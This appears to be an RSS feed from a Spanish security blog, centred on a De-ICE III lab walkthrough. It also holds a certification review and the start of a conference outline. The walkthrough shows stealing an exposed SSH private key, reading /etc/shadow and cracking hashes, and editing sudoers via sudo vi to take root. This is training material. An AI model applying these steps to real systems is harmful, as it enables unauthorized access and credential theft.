<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Sec-Track &#187; Penetration Test</title>
	<atom:link href="http://www.sec-track.com/tag/penetration-test/feed" rel="self" type="application/rss+xml" />
	<link>http://www.sec-track.com</link>
	<description></description>
	<lastBuildDate>Sat, 04 Sep 2010 19:44:19 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Certified Professional Penetration Tester</title>
		<link>http://www.sec-track.com/certified-professional-penetration-tester</link>
		<comments>http://www.sec-track.com/certified-professional-penetration-tester#comments</comments>
		<pubDate>Thu, 26 Aug 2010 09:48:52 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Certificaciones]]></category>
		<category><![CDATA[Penetration Test]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=744</guid>
		<description><![CDATA[Muy pocas veces hablo sobre mis certificaciones o preparación formal realizada. Esto sobre todo, por el hecho de que no soy  amante de los altos egos de algunos con respecto a estos temas. Otra razón muy importante es debido a que el hecho de tener una certificación o carrera profesional no garantiza en su totalidad [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Muy pocas veces hablo sobre mis certificaciones o preparación formal realizada. Esto sobre todo, por el hecho de que no soy  amante de los altos egos de algunos con respecto a estos temas. Otra razón muy importante es debido a que el hecho de tener una certificación o carrera profesional no garantiza en su totalidad que una persona tenga o no, los conocimientos necesarios para ejercer una labor. Soy de los que piensan que nada mejor que la práctica pura y dura para evaluar la experticia de las personas. Como decimos por ahí, &#8220;la práctica hace al maestro&#8221;.</p>
<p style="text-align: justify;">Toco este tema, debido a que a lo largo de mi carrera profesional e investigaciones relacionadas en la seguridad de la información, he realizado diferentes certificaciones y preparaciones formales en estos campos. Una de estas corresponde al título de este post.</p>
<p style="text-align: justify;">Esta prestigiosa certificación y que muchos se atreven a nombrar como &#8220;<strong>Penetration Testing Pro: the CEH killer</strong>&#8221; es ofrecida por el equipo de <a href="http://www.elearnsecurity.com" target="_blank"><strong>eLearnSecurity</strong></a> en un completo paquete de entrenamiento + certificación. El objetivo a lo largo de esta exigente preparación es aprender trabajando de manera práctica en cada uno de sus módulos propuestos.</p>
<p style="text-align: justify;"><strong>SECTION 1 WEB APPLICATION SECURITY TESTING<br />
OVERVIEW</strong></p>
<ul style="text-align: justify;">
<li>Module 1: Introduction</li>
<li>Module 2: Information Gathering</li>
<li>Module 3: Vulnerability assessment</li>
<li>Module 4: Cross site scripting</li>
<li>Module 5: SQL Injection</li>
<li>Module 6: Advanced Web Attacks</li>
</ul>
<p style="text-align: justify;"><strong>SECTION 2 NETWORK SECURITY TESTING<br />
OVERVIEW</strong></p>
<ul style="text-align: justify;">
<li>Module 1: Information Gathering</li>
<li>Module 2: Scanning</li>
<li>Module 3: Enumeration</li>
<li>Module 4: Sniffing and MITM attacks</li>
<li>Module 5: The Exploitation show</li>
<li>Module 6: Anonymity</li>
</ul>
<p style="text-align: justify;"><strong>SECTION 3 SYSTEM SECURITY<br />
OVERVIEW</strong></p>
<ul style="text-align: justify;">
<li>Module 1: Introduction</li>
<li>Module 2: Cryptography and Password Cracking</li>
<li>Module 3: Buffer Overflow</li>
<li>Module 4: Shellcoding</li>
<li>Module 5: Malware</li>
<li>Module 6: Rootkit coding</li>
</ul>
<p style="text-align: justify;"><strong>Los detalles del curso son:</strong></p>
<ul style="text-align: justify;">
<li>Online course—learn at your own pace</li>
<li>1000+ interactive slides</li>
<li>Learn methodology, be a professional</li>
<li>4 hours of videos</li>
<li>3 authors—3 sections</li>
<li>DVD Backtrack4 + Labs</li>
<li>Silver Certification</li>
<li>Qualifies you for 40 CPE</li>
</ul>
<p style="text-align: justify;">Un completo listado de las temáticas puede encontrarse en el <a href="http://www.elearnsecurity.com/course/penetration_testing/syllabus.pdf" target="_blank"><strong>documento Syllabus oficial</strong></a>.</p>
<p style="text-align: justify;">Además de esto, en el web site <a href="http://www.ethicalhacker.net/content/view/307/24/" target="_blank"><strong>The Ethical Network</strong></a> y en <a href="http://www.darknet.org.uk/2010/05/elearnsecurity-online-penetration-testing-training/" target="_blank"><strong>DarkNet </strong></a>han realizado unos completos reviews sobre el entrenamiento y la certificación, que puede ser de utilidad para quienes estén interesados en realizar este training.</p>
<p style="text-align: justify;">Por este mismo medio estaré publicando mis experiencias, alguna parte del material de entrenamiento (videos, ppts, entornos, sources) y algunos de los ejercicios propuestos, con el objetivo de encontrar otras opiniones, sugerencias y compartir con quienes quieran parte de este valioso recurso y estén proyectando realizarlo de manera oficial.</p>
<p style="text-align: justify;"><a href="http://www.elearnsecurity.com" target="_blank"><strong>Web oficial (Entrenamiento + Certificación) eLearnSecurity</strong></a></p>
<p style="text-align: justify;"><a href="http://www.elearnsecurity.com/course/penetration_testing/preview/player.html" target="_blank"><strong>Demo Training</strong></a></p>
<p style="text-align: justify;"><strong><a href="http://www.darknet.org.uk/2010/05/elearnsecurity-online-penetration-testing-training/" target="_blank">Review (DarkNet)</a></strong></p>
<p style="text-align: justify;"><a href="http://www.ethicalhacker.net/content/view/307/24/" target="_blank"><strong>Review (The Ethical Hacker Network)</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/certified-professional-penetration-tester/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Desarrollo del entorno De-Ice III – Acceso al Sistema y Elevación de Privilegios</title>
		<link>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-acceso-al-sistema-y-elevacion-de-privilegios</link>
		<comments>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-acceso-al-sistema-y-elevacion-de-privilegios#comments</comments>
		<pubDate>Tue, 01 Jun 2010 11:11:08 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[De-ICE]]></category>
		<category><![CDATA[john the ripper]]></category>
		<category><![CDATA[passwd]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[shadow]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=520</guid>
		<description><![CDATA[Continúa desde: Desarrollo del entorno De-Ice III – Pruebas de Autenticación y Escaneo de Vulnerabilidades Veamos ahora que podemos hacer con la información encontrada: Index of /~pirrip//.ssh Name Last modified Size Description Parent Directory - id_rsa 05-Jan-2008 20:29 1.6K id_rsa.pub 05-Jan-2008 20:29 393 Apache/2.0.55 (Unix) PHP/5.1.2 Server at 192.168.2.101 Port 80 Esta información corresponde a [...]]]></description>
			<content:encoded><![CDATA[<p>Continúa desde: <strong><a title="Permanent Link to Desarrollo del entorno De-Ice III – Pruebas de Autenticación y Escaneo de Vulnerabilidades" rel="bookmark" href="../desarrollo-del-entorno-de-ice-iii-%e2%80%93-pruebas-de-autenticacion-y-escaneo-de-vulnerabilidades">Desarrollo del entorno De-Ice III – Pruebas de Autenticación y Escaneo de Vulnerabilidades</a></strong></p>
<p>Veamos ahora que podemos hacer con la información encontrada:</p>
<h1>Index of /~pirrip//.ssh</h1>
<pre><img src="http://192.168.2.101/icons/blank.gif" alt="Icon " /> Name                    Last modified      Size  Description
<hr /><img src="http://192.168.2.101/icons/back.gif" alt="[DIR]" /> Parent Directory                             -
<img src="http://192.168.2.101/icons/unknown.gif" alt="[   ]" /> id_rsa                  05-Jan-2008 20:29  1.6K
<img src="http://192.168.2.101/icons/unknown.gif" alt="[   ]" /> id_rsa.pub              05-Jan-2008 20:29  393
<hr /></pre>
<address>Apache/2.0.55 (Unix) PHP/5.1.2 Server at 192.168.2.101 Port 80</address>
<address> </address>
<p style="text-align: justify;"><span id="more-520"></span>Esta información corresponde a la llave digital de acceso del usuario pirrip, muy posiblemente al realizarse la copia de seguridad previa a la migración del sistema, esta se olvidó en el antiguo server.</p>
<p>Descarguemos los archivos:</p>
<p><strong>root@Sec-Track:~/De-Ice2.100# wget http://192.168.2.101/~pirrip//.ssh/id_rsa.pub</strong><br />
&#8211;2010-06-01 02:11:32&#8211;  http://192.168.2.101/~pirrip//.ssh/id_rsa.pub<br />
Connecting to 192.168.2.101:80&#8230; connected.<br />
HTTP request sent, awaiting response&#8230; 200 OK<br />
Length: 393 [text/plain]<br />
Saving to: `id_rsa.pub&#8217;</p>
<p>100%[===========================================================&gt;] 393         &#8211;.-K/s   in 0s</p>
<p>2010-06-01 02:11:32 (44.7 MB/s) &#8211; `id_rsa.pub&#8217; saved [393/393]</p>
<p><strong>root@Sec-Track:~/De-Ice2.100# wget http://192.168.2.101/~pirrip//.ssh/id_rsa</strong><br />
&#8211;2010-06-01 02:11:46&#8211;  http://192.168.2.101/~pirrip//.ssh/id_rsa<br />
Connecting to 192.168.2.101:80&#8230; connected.<br />
HTTP request sent, awaiting response&#8230; 200 OK<br />
Length: 1675 (1.6K) [text/plain]<br />
Saving to: `id_rsa&#8217;</p>
<p>100%[===========================================================&gt;] 1,675       &#8211;.-K/s   in 0s</p>
<p>2010-06-01 02:11:46 (172 MB/s) &#8211; `id_rsa&#8217; saved [1675/1675]</p>
<p><strong>root@Sec-Track:~/De-Ice2.100# ls</strong><br />
id_rsa  id_rsa.pub</p>
<p>Una vez descargadas las llaves, procedemos a copiarlas al directorio /foo/.ssh</p>
<p><strong>root@Sec-Track:~/De-Ice2.100# cp id* /root/.ssh/</strong></p>
<p><strong>root@Sec-Track:~/.ssh# ls</strong><br />
id_rsa  id_rsa.pub  known_hosts</p>
<p>Confirmamos que la llave corresponde al usuario pirrip</p>
<p><strong>root@Sec-Track:~/.ssh# more id_rsa.pub</strong><br />
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA1pfb/CVukUw4Xe67YLEZzVHWNax0zJjI1CfcsoEGylmm<br />
tlA6iXHi41nLshzXu9n536JfM9LFAWGqefBVX7Bzd/fC4+jHS3q89IK9FP7gFPwEmlNHCwPX0ADxDFyB<br />
1lJOFffJ9gVw3VgHCaCPgS70UqJD0hZFDMSDMoBa91PylFQR0m58nMq8DsGRbeC5hTdpLXKfBuW8v/lF<br />
uNEWVWNcZDie82aiJg8WRUUIrzeGZSR3+cG1hi6za67VIi+ce8fFuBvIgaEpvJ0JSIX7zPLUV10ezW1N<br />
QRNplKSam3TIYI3+YwuhlcgpEyliHYReN6v91+um2c6LNy9y/vx2Akci5Q== <strong>pirrip@slax</strong></p>
<p>Por lo tanto realicemos la conexión al sistema objetivo!!</p>
<p><strong>root@Sec-Track:~/.ssh# ssh pirrip@192.168.2.100</strong><br />
The authenticity of host &#8217;192.168.2.100 (192.168.2.100)&#8217; can&#8217;t be established.<br />
RSA key fingerprint is ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10.<br />
Are you sure you want to continue connecting (yes/no)? yes<br />
Warning: Permanently added &#8217;192.168.2.100&#8242; (RSA) to the list of known hosts.<br />
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@<br />
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @<br />
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@<br />
Permissions 0644 for &#8216;/root/.ssh/id_rsa&#8217; are too open.<br />
It is recommended that your private key files are NOT accessible by others.<br />
This private key will be ignored.<br />
bad permissions: ignore key: /root/.ssh/id_rsa<br />
pirrip@192.168.2.100&#8242;s password:</p>
<p>Como vemos las llaves presentan un error de permisos&#8230; Por lo tanto cambiemos estos:</p>
<p><strong>root@Sec-Track:~/.ssh# ls -la</strong><br />
total 20<br />
drwx&#8212;&#8212;  2 root root 4096 Jun  1 02:18 .<br />
drwxr-xr-x 77 root root 4096 Jun  1 02:09 ..<br />
<strong>-r&#8211;r&#8211;r&#8211; </strong> 1 root root 1675 Jun  1 02:17 id_rsa<br />
<strong>-r&#8211;r&#8211;r&#8211;</strong> 1 root root  393 Jun  1 02:17 id_rsa.pub<br />
-rw-r&#8211;r&#8211;  1 root root 1768 Jun  1 02:21 known_hosts<br />
<strong>root@Sec-Track:~/.ssh# chmod 000 id*</strong><br />
<strong>root@Sec-Track:~/.ssh# ls -l</strong>a<br />
total 20<br />
drwx&#8212;&#8212;  2 root root 4096 Jun  1 02:18 .<br />
drwxr-xr-x 77 root root 4096 Jun  1 02:09 ..<br />
<strong>&#8212;&#8212;&#8212;-</strong> 1 root root 1675 Jun  1 02:17 id_rsa<br />
<strong>&#8212;&#8212;&#8212;-</strong> 1 root root  393 Jun  1 02:17 id_rsa.pub<br />
-rw-r&#8211;r&#8211;  1 root root 1768 Jun  1 02:21 known_hosts</p>
<p>Ahora si&#8230; Conectémonos al host</p>
<p><strong>root@Sec-Track:~/.ssh# ssh pirrip@192.168.2.100</strong><br />
Linux 2.6.16.<br />
pirrip@slax:~$</p>
<p style="text-align: justify;">Muy bien&#8230; Ya estamos dentro del sistema objetivo&#8230; Ahora como en  todos los Test de Penetración que hemos realizado, tratemos de escalar privilegios.</p>
<p><strong>pirrip@slax:~$ cat /etc/passwd</strong><br />
<strong>root</strong> <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_mad.gif' alt=':x' class='wp-smiley' /> :0:0::/root:/bin/bash<br />
bin:x:1:1:bin:/bin:<br />
daemon:x:2:2:daemon:/sbin:<br />
adm:x:3:4:adm:/var/log:<br />
lp:x:4:7:lp:/var/spool/lpd:<br />
sync:x:5:0:sync:/sbin:/bin/sync<br />
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown<br />
halt:x:7:0:halt:/sbin:/sbin/halt<br />
mail:x:8:12:mail:/:<br />
news:x:9:13:news:/usr/lib/news:<br />
uucp:x:10:14:uucp:/var/spool/uucppublic:<br />
operator:x:11:0:operator:/root:/bin/bash<br />
games:x:12:100:games:/usr/games:<br />
ftp:x:14:50::/home/ftp:<br />
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:<br />
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash<br />
rpc:x:32:32:RPC portmap user:/:/bin/false<br />
sshd:x:33:33:sshd:/:<br />
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash<br />
pop:x:90:90:POP:/:<br />
nobody:x:99:99:nobody:/:<br />
<strong>pirrip</strong> <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_mad.gif' alt=':x' class='wp-smiley' /> :1000:<strong>10</strong> <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> hilip Pirrip:/home/pirrip:/bin/bash<br />
<strong>magwitch</strong> <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_mad.gif' alt=':x' class='wp-smiley' /> :1001:100:Abel Magwitch:/home/magwitch:/bin/bash<br />
<strong>havisham</strong> <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_mad.gif' alt=':x' class='wp-smiley' /> :1002:100:Estella Havisham:/home/havisham:/bin/bash</p>
<p style="text-align: justify;">Vemos como nuestro usuario pirrip tiene el ID 10&#8230; Comprobemos entonces los grupos.</p>
<p style="text-align: justify;"><strong>pirrip@slax:/tmp$ cat /etc/group</strong><br />
root::0:root<br />
bin::1:root,bin,daemon<br />
daemon::2:root,bin,daemon<br />
sys::3:root,bin,adm<br />
adm::4:root,adm,daemon<br />
tty::5:<br />
disk::6:root,adm<br />
lp::7:lp<br />
mem::8:<br />
kmem::9:<br />
<strong>wheel::10:root</strong><br />
floppy::11:root<br />
mail::12:mail<br />
news::13:news<br />
uucp::14:uucp<br />
man::15:<br />
audio::17:<br />
video::18:<br />
cdrom::19:<br />
games::20:<br />
slocate::21:<br />
utmp::22:<br />
smmsp::25:smmsp<br />
mysql::27:<br />
rpc::32:<br />
sshd::33:sshd<br />
gdm::42:<br />
shadow::43:<br />
ftp::50:<br />
pop::90:pop<br />
scanner::93:<br />
nobody::98:nobody<br />
nogroup::99:<br />
users::100:<br />
console::101:</p>
<p style="text-align: justify;">Por lo tanto podremos utilizar el comando <strong>sudo</strong></p>
<p style="text-align: justify;"><strong>pirrip@slax:/tmp$ cat /etc/shadow</strong><br />
cat: /etc/shadow: Permission denied</p>
<p style="text-align: justify;"><strong>pirrip@slax:/tmp$ sudo cat /etc/shadow</strong></p>
<p>We trust you have received the usual lecture from the local System<br />
Administrator. It usually boils down to these three things:</p>
<p>#1) Respect the privacy of others.<br />
#2) Think before you type.<br />
#3) With great power comes great responsibility.</p>
<p>Password:</p>
<p style="text-align: justify;">Lamentablemente desconocemos nuestro password.</p>
<p style="text-align: justify;">Ahora observaremos en detalle la versión del sistema objetivo y trataremos identificar alguna vulnerabilidad reportada, ubicar algún exploit y ejecutarlo desde la carpeta /tmp</p>
<p><strong>pirrip@slax:~$ uname -r</strong><br />
2.6.16<br />
<strong>pirrip@slax:~$ cd /tmp/</strong><br />
You have mail in /var/mail/pirrip</p>
<p>Para nuestra sorpresa, cuando decidí cambiarme a la carpeta /tmp recibí el mensaje de que tengo un email &#8230; Veamos de que se trata</p>
<p><strong>pirrip@slax:/tmp$ mail</strong><br />
mailx version nail 11.25 7/29/05.  Type ? for help.<br />
&#8220;/var/mail/pirrip&#8221;: 7 messages 7 unread<br />
&gt;U  1 Abel Magwitch      Sun Jan 13 23:53   21/758   Estella<br />
U  2 Estella Havisham   Sun Jan 13 23:53   21/790   welcome to the team<br />
U  3 Abel Magwitch      Sun Jan 13 23:53   21/885   havisham<br />
U  4 Estella Havisham   Mon Jan 14 00:05   21/871   next month<br />
U  5 Abel Magwitch      Mon Jan 14 00:05   21/878   vacation<br />
U  6 Abel Magwitch      Mon Jan 14 00:05   21/925   vacation<br />
U  7 noreply@fermion.he Mon Jan 14 00:05   30/993   Fermion Account Login Reminder<br />
? 1<br />
<strong>Message  1:</strong><br />
From magwitch@slax.example.net  Sun Jan 13 23:53:37 2008<br />
Return-Path: &lt;magwitch@slax.example.net&gt;<br />
From: Abel Magwitch &lt;magwitch@slax.example.net&gt;<br />
Date: Sun, 13 Jan 2008 23:47:48 +0000<br />
To: pirrip@slax.example.net<br />
Subject: Estella<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>Will do.</p>
<p>?<br />
<strong>Message  2:</strong><br />
From havisham@slax.example.net  Sun Jan 13 23:53:37 2008<br />
Return-Path: &lt;havisham@slax.example.net&gt;<br />
From: Estella Havisham &lt;havisham@slax.example.net&gt;<br />
Date: Sun, 13 Jan 2008 23:50:33 +0000<br />
To: pirrip@slax.example.net<br />
Subject: welcome to the team<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>Thanks!  Glad to be here.</p>
<p>?<br />
<strong>Message  3:</strong><br />
From magwitch@slax.example.net  Sun Jan 13 23:53:37 2008<br />
Return-Path: &lt;magwitch@slax.example.net&gt;<br />
From: Abel Magwitch &lt;magwitch@slax.example.net&gt;<br />
Date: Sun, 13 Jan 2008 23:48:57 +0000<br />
To: pirrip@slax.example.net<br />
Subject: havisham<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>I set her up with an accountus servers.  I set her password to &#8220;<strong>changeme</strong>&#8221; and will swing by tomorrow and make sure she changes her pw.</p>
<p>?<br />
<strong>Message  4:</strong><br />
From havisham@slax.example.net  Mon Jan 14 00:05:15 2008<br />
Return-Path: &lt;havisham@slax.example.net&gt;<br />
From: Estella Havisham &lt;havisham@slax.example.net&gt;<br />
Date: Mon, 14 Jan 2008 00:03:56 +0000<br />
To: pirrip@slax.example.net<br />
Subject: next month<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>Abel filled me in about next month.  I wanted to ask you if I can grab the week you get back for vacation?  Thanks.</p>
<p>?<br />
<strong>Message  5:</strong><br />
From magwitch@slax.example.net  Mon Jan 14 00:05:15 2008<br />
Return-Path: &lt;magwitch@slax.example.net&gt;<br />
From: Abel Magwitch &lt;magwitch@slax.example.net&gt;<br />
Date: Sun, 13 Jan 2008 23:55:41 +0000<br />
To: pirrip@slax.example.net<br />
Subject: vacation<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>Hey, I&#8217;ll be taking vacation the second week of next month.  Have any additional tasks that need to be taen care of in advance?</p>
<p>?<br />
<strong>Message  6:</strong><br />
From magwitch@slax.example.net  Mon Jan 14 00:05:15 2008<br />
Return-Path: &lt;magwitch@slax.example.net&gt;<br />
From: Abel Magwitch &lt;magwitch@slax.example.net&gt;<br />
Date: Sun, 13 Jan 2008 23:58:28 +0000<br />
To: pirrip@slax.example.net<br />
Subject: vacation<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>Sure &#8211; so far, she&#8217;s doing just fine.  I have assigned her a couple web issues and the ftp installation for 2.100.  She seems to be very comfortable, even with the new stuff.</p>
<p>?<br />
<strong>Message  7:</strong><br />
From noreply@fermion.herot.net  Mon Jan 14 00:05:15 2008<br />
Return-Path: &lt;noreply@fermion.herot.net&gt;<br />
From: noreply@fermion.herot.net<br />
Date: Sun, 13 Jan 2008 23:54:42 +0000<br />
To: pirrip@slax.example.net<br />
Subject: Fermion Account Login Reminder<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>Fermion Account Login Reminder</p>
<p>Listed below are your Fermion Account login credentials.  Please let us know if you have any questions or problems.</p>
<p>Regards,<br />
Fermion Support<br />
<strong><br />
</strong>E-Mail: pirrip@slax.example.net<strong><br />
Password: 0l1v3rTw1st</strong></p>
<p>Vemos que interesante información nos encontramos en el email 7 y 3 &#8230; Nuestro password y el de havisham!!</p>
<p>Intentemos nuevamente listar el contenido de passwd</p>
<p><strong>pirrip@slax:/tmp$ sudo cat /etc/shadow</strong></p>
<p>We trust you have received the usual lecture from the local System<br />
Administrator. It usually boils down to these three things:</p>
<p>#1) Respect the privacy of others.<br />
#2) Think before you type.<br />
#3) With great power comes great responsibility.</p>
<p>Password:</p>
<p>Sorry, user pirrip is not allowed to execute &#8216;/usr/bin/cat /etc/shadow&#8217; as root on slax.</p>
<p style="text-align: justify;">Parece que no tenemos disponible el comando cat.. Comprobemos entonces que comandos interesantes y de utilidad tenemos&#8230;</p>
<p><strong>pirrip@slax:/tmp$ sudo bash</strong><br />
Sorry, user pirrip is not allowed to execute &#8216;/usr/bin/bash&#8217; as root on slax.<br />
<strong>pirrip@slax:/tmp$ sudo sh</strong><br />
Sorry, user pirrip is not allowed to execute &#8216;/bin/sh&#8217; as root on slax.<br />
<strong>pirrip@slax:/tmp$ sudo ls</strong><br />
Sorry, user pirrip is not allowed to execute &#8216;/usr/bin/ls&#8217; as root on slax.<br />
<strong>pirrip@slax:/tmp$ sudo nano</strong><br />
sudo: nano: command not found<br />
<strong>pirrip@slax:/tmp$ sudo more</strong><br />
usage: more [-dflpcsu] [+linenum | +/pattern] name1 name2 &#8230;<br />
<strong>pirrip@slax:/tmp$ sudo vi</strong></p>
<p style="text-align: justify;">Perfecto, a pesar de no tener disponibles la mayoría de comandos, si tenemos disponibles 2 muy importantes!!! <strong>more</strong> y <strong>vi</strong> . Veamos que podemos hacer con estos.</p>
<p style="text-align: justify;"><strong>pirrip@slax:/tmp$ sudo more /etc/shadow</strong><br />
Password:<br />
<strong>root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::</strong><br />
bin:*:9797:0:::::<br />
daemon:*:9797:0:::::<br />
adm:*:9797:0:::::<br />
lp:*:9797:0:::::<br />
sync:*:9797:0:::::<br />
shutdown:*:9797:0:::::<br />
halt:*:9797:0:::::<br />
mail:*:9797:0:::::<br />
news:*:9797:0:::::<br />
uucp:*:9797:0:::::<br />
operator:*:9797:0:::::<br />
games:*:9797:0:::::<br />
ftp:*:9797:0:::::<br />
smmsp:*:9797:0:::::<br />
mysql:*:9797:0:::::<br />
rpc:*:9797:0:::::<br />
sshd:*:9797:0:::::<br />
gdm:*:9797:0:::::<br />
pop:*:9797:0:::::<br />
nobody:*:9797:0:::::<br />
<strong>pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::<br />
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::<br />
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::</strong></p>
<p style="text-align: justify;">Genial&#8230; Llevemos estos resultados a la herramienta de password cracking John The Ripper.</p>
<p style="text-align: left;"><strong>root@Sec-Track:/pentest/passwords/jtr# ./john &#8211;user=root &#8211;w=/root/passwords/verycool.lst 100.txt</strong><br />
Loaded 1 password hash (FreeBSD MD5 [32/32])<br />
guesses: 0  time: 0:00:08:49 100.00% (ETA: Tue Jun  1 04:48:21 2010)  c/s: 4526  trying: aceguero</p>
<p style="text-align: left;">Lamentablemente no hemos dado con el password de root&#8230; Posiblemente sea un password complejo que no se encuentra incluido en nuestro diccionario.</p>
<p style="text-align: left;">Poniendo a prueba nuestra creatividad, veamos lo que podemos hacer con el comando vi sobre sudo.</p>
<p style="text-align: left;"><strong>pirrip@slax:/tmp$ sudo vi /etc/sudoers</strong><br />
Password:<br />
reading /etc/sudoers</p>
<p style="text-align: left;">Allí modifico los permisos para nuestro usuario pirrip</p>
<p style="text-align: left;"><strong># User privilege specification<br />
root    ALL=(ALL) ALL<br />
pirrip  ALL=(ALL) ALL</strong></p>
<p style="text-align: left;">Ahora tenemos todos los permisos de sudo para ejecutar cualquier comando&#8230; Incluyendo el siguiente!!</p>
<p style="text-align: left;"><strong>pirrip@slax:/tmp$ sudo passwd root</strong><br />
Changing password for root<br />
Enter the new password (minimum of 5, maximum of 127 characters)<br />
Please use a combination of upper and lower case letters and numbers.<br />
New password: ***********<br />
Re-enter new password: ***********<br />
Password changed.</p>
<p style="text-align: left;">Ahora solo basta:</p>
<p style="text-align: left;"><strong>pirrip@slax:/tmp$ su</strong><br />
Password: ***********<br />
<strong>root@slax:/tmp# </strong></p>
<p style="text-align: left;">Para el próximo post veremos algunos otros métodos para comprometer este sistema&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-acceso-al-sistema-y-elevacion-de-privilegios/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Conferencia: Laboratorios de Entrenamiento en Seguridad Informática &#8211; FLISOL 2010</title>
		<link>http://www.sec-track.com/conferencia-laboratorios-de-entrenamiento-en-seguridad-informatica-flisol-2010</link>
		<comments>http://www.sec-track.com/conferencia-laboratorios-de-entrenamiento-en-seguridad-informatica-flisol-2010#comments</comments>
		<pubDate>Tue, 04 May 2010 01:52:15 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Documentos]]></category>
		<category><![CDATA[Conferencias]]></category>
		<category><![CDATA[Criptografía]]></category>
		<category><![CDATA[Digital Forensics]]></category>
		<category><![CDATA[Hardening]]></category>
		<category><![CDATA[Informática Forense]]></category>
		<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[Penetration Test]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=524</guid>
		<description><![CDATA[El pasado 24 de abril tuve el placer de asistir como conferencista al Festival Internacional de Instalación de Software Libre desarrollado en Medellín. La conferencia que presenté trató sobre la implementación de Laboratorios de Entrenamiento en Seguridad Informática, y de como el Proyecto Sec-Track puede ser una magnífica herramienta para cumplir con ese objetivo. El [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El pasado 24 de abril tuve el placer de asistir como conferencista al <a href="http://www.flisol.info/FLISOL2010/Colombia/Medellin" target="_blank"><strong>Festival Internacional de Instalación de Software Libre desarrollado en Medellín</strong></a>.</p>
<p style="text-align: justify;">La conferencia que presenté trató sobre la implementación de Laboratorios de Entrenamiento en Seguridad Informática, y de como el <a href="http://www.sec-track.com" target="_blank"><strong>Proyecto Sec-Track</strong></a> puede ser una magnífica herramienta para cumplir con ese objetivo.</p>
<p style="text-align: justify;">El contenido temático de dicha conferencia, es el siguiente:</p>
<ul>
<li>Descripción del Proyecto Sec-Track</li>
<li>Por qué implementar laboratorios de entrenamiento?
<ul>
<li>Facil inicio para aprendices</li>
<li>Diferentes niveles de complejidad</li>
<li>Portables</li>
<li>Simulación de entornos reales</li>
<li>Implicaciones legales</li>
<li>Problemas de conexión</li>
<li>Tiempo de desarrollo de escenarios</li>
<li>Costos</li>
<li>Tu lo construyes&#8230; Tu sabes como resolverlo</li>
<li>Posibilidad de crear comunidad</li>
</ul>
</li>
<li>Implementación de Hardware
<ul>
<li>Computadores (Dispositivos)</li>
<li>Herramientas de Red</li>
<li>Cables</li>
<li>Hubs</li>
<li>Switches</li>
<li>Routers</li>
<li>Dispositivos de almacenamiento</li>
<li>Firewalls</li>
<li>Acces Points</li>
<li>Reguladores eléctricos</li>
</ul>
</li>
<li>Implementación de Software
<ul>
<li>Virtualización</li>
